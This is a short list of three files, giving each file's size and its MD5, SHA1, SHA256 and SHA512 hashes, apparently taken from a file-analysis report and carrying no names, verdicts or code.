-
Filesize
5.6MB
MD513b26b2c7048a92d6a843c1302618fad
SHA189c2dfc01ac12ef2704c7669844ec69f1700c1ca
SHA2561753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256
SHA512d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455
-
Filesize
9KB
MD58d8e6c7952a9dc7c0c73911c4dbc5518
SHA19098da03b33b2c822065b49d5220359c275d5e94
SHA256feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278
SHA51291a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82